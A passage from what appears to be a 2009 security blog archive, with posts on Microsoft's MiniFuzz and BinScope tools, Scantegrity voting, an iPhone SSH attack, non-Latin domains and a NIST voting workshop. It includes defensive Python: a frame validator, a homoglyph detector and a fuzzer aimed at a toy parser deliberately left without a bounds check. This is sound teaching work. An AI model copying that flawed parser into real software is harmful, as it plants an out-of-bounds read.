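SAMPLE_BODY = SMB2_MAGIC + b"\x00" * (0x9e - len(SMB2_MAGIC))
GOOD_FRAME = build_frame(SAMPLE_BODY)
BAD_FRAME = build_frame(SAMPLE_BODY, declared=0x9a)


if __name__ == "__main__":
    for label, frame in (("good", GOOD_FRAME), ("bad", BAD_FRAME)):
        print(label, validate_netbios_frame(frame))
```

A receiver reading from a socket should read exactly the declared number of bytes, then verify that the SMB header inside is complete before parsing any further; a declared length that does not match what the peer sent is a reason to drop the connection, not to loop waiting for the rest.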

Tuesday, November 10, 2009

Microsoft MiniFuzzer

Microsoft SDL team releases two security verification tools as FREE DOWNLOADS
BinScope Binary Analyzer integrates directly into the Visual Studio 2008 IDE. MiniFuzz File Fuzzer is a Visual Studio 2008 add-in. Both tools provide easy integration with TFS 2008 and the SDL Process Template for VSTS 2008! Both of them are available here.
MiniFuzz File Fuzzer.
MiniFuzz is a basic testing tool designed to help detect code flaws that may expose security vulnerabilities in file-handling code. This tool creates multiple random variations of file content and feeds it to the application to exercise the code in an attempt to expose unexpected application behaviors.

Because fuzzing is effective at finding bugs, it is a required activity in the Verification Phase of the Microsoft Security Development Lifecycle (SDL). With the release of MiniFuzz, we have made a simple file fuzzer available to assist developer efforts to find and address more bugs in code before it ships to customers.
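To show what "random variations of file content" actually finds, here is a small mutation fuzzer as an added example (my own code, not MiniFuzz and not anything from Microsoft's tool). The file format, its parser and the harness are all constructed: the parser trusts a length field, the fuzzer mutates a valid seed file with byte flips, edge values, insertions and truncations, and any exception other than a clean rejection counts as a finding. The hardened parser beside it shows the bounds check the findings point to.

```python
import random
import struct


def parse_record(data: bytes) -> dict:
    """Toy parser for a constructed format: 4-byte big-endian length, payload, 1-byte checksum.
    It trusts the length field, the kind of flaw a file fuzzer is meant to surface."""
    if len(data) < 5:
        raise ValueError("record too short")
    n = struct.unpack(">I", data[:4])[0]
    payload = data[4:4 + n]
    checksum = data[4 + n]            # IndexError when n points past the end of the buffer
    if checksum != sum(payload) & 0xFF:
        raise ValueError("bad checksum")
    return {"length": n, "payload": payload}


def parse_record_hardened(data: bytes) -> dict:
    """Same format, with the bounds check the fuzzer shows is missing."""
    if len(data) < 5:
        raise ValueError("record too short")
    n = struct.unpack(">I", data[:4])[0]
    if 4 + n + 1 > len(data):
        raise ValueError("declared length exceeds buffer")
    payload = data[4:4 + n]
    checksum = data[4 + n]
    if checksum != sum(payload) & 0xFF:
        raise ValueError("bad checksum")
    return {"length": n, "payload": payload}


def make_seed(payload: bytes) -> bytes:
    """Build a valid record to start from; fuzzing works best from a well-formed seed."""
    return struct.pack(">I", len(payload)) + payload + bytes([sum(payload) & 0xFF])


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply 1-4 random byte-level mutations: bit flip, edge value, insertion, truncation."""
    buf = bytearray(data)
    for _ in range(rng.randint(1, 4)):
        choice = rng.randrange(4)
        if choice == 0 and buf:
            i = rng.randrange(len(buf))
            buf[i] ^= 1 << rng.randrange(8)
        elif choice == 1 and buf:
            i = rng.randrange(len(buf))
            buf[i] = rng.choice((0x00, 0x7F, 0x80, 0xFF))
        elif choice == 2:
            buf.insert(rng.randint(0, len(buf)), rng.randrange(256))
        elif buf:
            del buf[rng.randrange(len(buf)):]
    return bytes(buf)


def classify(parser, data: bytes):
    """None = parsed, 'expected' = clean rejection (ValueError), else the exception class name."""
    try:
        parser(data)
        return None
    except ValueError:
        return "expected"
    except Exception as exc:
        return type(exc).__name__


def fuzz(parser, seed: bytes, iterations: int = 500, rng_seed: int = 1) -> list:
    """Run a deterministic campaign; returns (iteration, exception name, input) per finding."""
    rng = random.Random(rng_seed)
    findings = []
    for i in range(iterations):
        case = mutate(seed, rng)
        verdict = classify(parser, case)
        if verdict not in (None, "expected"):
            findings.append((i, verdict, case))
    return findings


if __name__ == "__main__":
    seed = make_seed(b"hello fuzz")
    print("buggy parser findings:", len(fuzz(parse_record, seed)))
    print("hardened parser findings:", len(fuzz(parse_record_hardened, seed)))
```

Seeding the generator makes every campaign reproducible, which matters when a finding has to be handed to a developer; a real file fuzzer adds format-aware mutations and runs the target in a separate process so a crash does not take the harness down.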
BinScope Binary Analyzer.
The BinScope Binary Analyzer is a Microsoft verification tool that analyzes binaries to ensure that they have been built in compliance with Microsoft’s Security Development Lifecycle (SDL) requirements and recommendations. BinScope checks that SDL-required compiler/linker flags are being set, strong-named assemblies are in use, and up-to-date build tools are in place.

BinScope also reports on dangerous constructs that are prohibited or discouraged by the SDL (e.g. read/write shared sections and global function pointers). For a more detailed enumeration of the checks performed by BinScope, please see the BinScope documentation. BinScope is available in two forms: as a standalone executable and as a Visual Studio add-on.

UPDATE: Here is a first impression. Take a look.

Monday, November 9, 2009

Why Prof. Chaum's Machines Don't Work in California

Maryland tested the new verifiable voting system designed by David Chaum and his team. I haven't seen logs or comments about it so far, but I believe everything went fine. Immediately after the news my question was: why don't we try the system in a bigger contest, for example California? Compared with the current test, I believe a wider range of people would prove higher reliability, and many more test cases (I know it is a pretty new system, but I also know it has been studied for a while) would stress the system.



Even though I've been living in the US for two years, I still forget that each state has its own laws. Thanks to my friend and colleague Sean I finally understood why Scantegrity cannot be used in California.

These are the two main legal issues:
13204. (a) "All distinguishing marks or erasures are forbidden and
make the ballot void."

and

14287. "No voter shall place any mark upon a ballot that will make
that ballot identifiable."

Here are the official voting codes: Voting Machine dir. (Section 13280-13289), Election Code dir. (13200-13220) and some exceptions (Section 13230-13233).

For people who don't know how Scantegrity works, here is a nice graphical summary.



As you can see in the figure above, voters have to mark the ballot ("What Voter Leaves in the Ballot Box") and can keep a proof of their vote (A: "What Voter Takes Home").

Sunday, November 8, 2009

Thank you xkcd !

I often enjoy the xkcd comics, but this is super !



via xkcd

Friday, November 6, 2009

Maryland Tested New Electronic Voting System

From Wired.




On Tuesday voters in Takoma Park, Maryland, got to try out a new, transparent voting system that lets voters go online to verify that their ballots got counted in the final tally. The system also lets anyone independently audit election results to verify the votes went to the correct candidates.

The open source, optical-scan system, called Scantegrity, was developed by cryptographer David Chaum, with researchers from MIT, the University of Maryland - Baltimore County, George Washington University, the University of Ottawa and the University of Waterloo. It’s similar to another system, called Punchscan, that won the researchers $10,000 in 2007 at a voting machine competition sponsored by the National Science Foundation.


I'm looking forward to seeing the new logs!

Tuesday, November 3, 2009

iPhone Hostage. 5 Bucks for Releasing.

What happens if you forget to change your iPhone's SSH password and you're using GPRS or 3G? Of course you'll be hacked.



It appears one enterprising Dutch hacker used port scanning to identify jailbroken iPhones on T-mobile Netherlands with SSH running. Enabling SSH is a common procedure for jailbroken iPhones, allowing a user to log in via Terminal and run standard UNIX commands. Unfortunately, iPhones all have a default root password that many forget to change after jailbreaking, leaving their phone as vulnerable as a Lamborghini parked on a public street with the windows down, the doors unlocked, and the keys in the ignition.


Read more here.

ICANN Approves Non Latin Character Domains

This is absolutely true: ICANN said "Yes" to Unicode DNS domains.



It's hard to judge. On one hand we get a more international "world wide web":


Let's face it; millions of Internet users speak languages that aren't written using Roman characters. Allowing Web sites to have domains that use other characters will make Web addresses more recognizable to some and make the Web more accessible to millions of new users.
The transition will begin on November 16 when countries can apply for country codes in their own unique character sets.
"The first countries that participate will not only be providing valuable information of the operation of IDNs in the domain name system, they are also going to help to bring the first of billions more people online -- people who never use Roman characters in their daily lives," ICANN CEO and President Rod Beckstrom said in a statement.


But on the other hand we have some obvious security problems:



Expanding beyond Roman characters also increases potential for site rip-offs that use homoglyphs, characters with identical or indistinguishable shapes. This already occurs to some degree (for instance pointing your browser to google.com takes you to a different site than go0gle.com) but different languages might have characters that are identical to characters in other languages.



If you're interested, follow the Google thread here, and some more reading about that here, here and here.
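The two risks named above, confusable characters within one script (go0gle.com) and look-alikes borrowed from another script, can both be caught on the defender's side before a link is followed. The Python below is an added example of mine (not from ICANN, Google or any of the linked articles): it encodes the domain to the punycode form the resolver actually sees, flags labels that mix writing systems, and collapses confusable characters into a "skeleton" so a look-alike of a protected name compares equal to it. The confusables table is a small constructed subset; a production check would load the full Unicode confusables data.

```python
import unicodedata

# Constructed subset of Unicode's confusables: each look-alike maps to the Latin character
# it imitates. A production check loads the full confusables.txt instead of this table.
CONFUSABLES = {
    "0": "o", "1": "l",                                          # ASCII look-alikes, as in go0gle.com
    "\u0430": "a", "\u0435": "e", "\u043e": "o",                 # Cyrillic а е о
    "\u0440": "p", "\u0441": "c", "\u0443": "y", "\u0445": "x",  # Cyrillic р с у х
    "\u03b1": "a", "\u03bf": "o",                                # Greek alpha, omicron
}


def scripts_in(label: str) -> set:
    """Writing systems used in one DNS label, taken from the first word of each character's
    Unicode name (LATIN, CYRILLIC, GREEK, ...). Digits and hyphens are script-neutral."""
    scripts = set()
    for ch in label:
        if ch.isdigit() or ch == "-":
            continue
        name = unicodedata.name(ch, "")
        scripts.add(name.split(" ")[0] if name else "UNKNOWN")
    return scripts


def skeleton(label: str) -> str:
    """Collapse confusable characters so look-alike labels compare equal."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label.lower())


def to_ascii(domain: str) -> str:
    """The punycode form the resolver queries (Python's stdlib IDNA codec)."""
    return domain.encode("idna").decode("ascii")


def assess(domain: str, protected=("google.com",)) -> dict:
    """Flag mixed-script labels and skeleton collisions with a list of protected names
    (the default list is a constructed placeholder for a brand allowlist)."""
    labels = domain.lower().split(".")
    report = {"ascii": to_ascii(domain), "mixed_script": [], "lookalike_of": None}
    for label in labels:
        if len(scripts_in(label)) > 1:
            report["mixed_script"].append(label)
    sk = ".".join(skeleton(label) for label in labels)
    for name in protected:
        if domain.lower() != name and sk == ".".join(skeleton(l) for l in name.split(".")):
            report["lookalike_of"] = name
    return report


if __name__ == "__main__":
    for d in ("google.com", "go0gle.com", "g\u043e\u043egle.com"):
        print(d, assess(d))
```

Browsers apply the same two ideas, showing the xn-- form whenever a label mixes scripts, which is why the punycode view is the one to log and compare, not the pretty Unicode rendering.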

Friday, October 30, 2009

What happened to Google ?

Hi Folks,
yesterday evening, while I was planning my road trip from Washington DC to Davis (CA), I found this interesting Google bug (?)



Well.... Which button should I click to send the link to my friend?

Thursday, October 29, 2009

Workshop on a Common Data Format for Electronic Voting System

Today and tomorrow I'm involved in the NIST Workshop on a Common Data Format for Electronic Voting System.

The goal of this two-day workshop is to identify and agree upon a set of requirements for a common data format for voting systems. While there have been many calls for a common data format for voting systems, there is little consensus on the requirements for this format or what it is to accomplish. Possible goals for a common data format include interoperability of different equipment, auditability, transparency, publishing (communication with consumers of election data, such as media outlets), integration between polls and registration, transition to electronic record-keeping, or the ability just to "get the data out" by any means possible. Stakeholders include manufacturers, election officials, the EAC, consumers of election data, voters, organizations with existing data formats (including OASIS and the Voting Information Project), academics, and others with related work.


I believe this workshop comes at the right time: we really need a common data format. Right now there are too many different formats, and each vendor uses its own for final reports, configuration files and communication messages. So far, not only is interoperability a dream, but integration is also very far from current voting systems. EML seems to be the guiding light and the common reference for every system, but it is also huge. Just to give a little flavour, EML covers four big areas:


- Transactions (Pre-election, Election and Post-election)

- Specification (outlines the voting process, identifies data requirements, contains a glossary of terms, addresses security issues, gives an overview of the XML schemas)

- Data Dictionary (defines all exchanged data components)

- XML Schema (family of 38 components, 29 specific exchange schemas, 2 new US-driven schemas developed for UML 6.0)



In addition, we have to remember that laws differ from state to state, and EML may permit something that is forbidden in some states. On the other side of the coin, we cannot implement different EML dialects, or we'd be back to the present situation. Moreover, US precincts are very different: some are huge, like LA (millions of voters), and others are small (hundreds of voters), and they use different kinds of voting systems. This is another issue: it's difficult to design a data format general enough to satisfy every precinct.

So, let's go ! We have a lot to do to improve our democracy.